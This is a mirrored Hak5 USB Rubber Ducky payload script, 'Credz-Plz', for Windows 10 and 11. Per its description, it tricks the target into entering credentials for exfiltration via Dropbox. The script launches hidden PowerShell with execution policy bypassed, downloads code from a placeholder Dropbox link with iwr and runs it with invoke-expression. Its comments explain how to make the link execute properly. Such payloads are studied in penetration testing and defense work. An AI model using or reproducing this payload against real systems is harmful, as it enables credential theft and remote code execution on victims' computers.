Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/credentials/-RD-Credz-Plz/Credz-Plz-Execute.txt
2968 views
1
REM Title: Credz-Plz
2
3
REM Author: I am Jakoby
4
5
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
6
7
REM Target: Windows 10, 11
8
9
GUI r
10
DELAY 500
11
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
12
ENTER
13
14
REM Remember to replace the link with your DropBox shared link for the intended file to download
15
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
16
17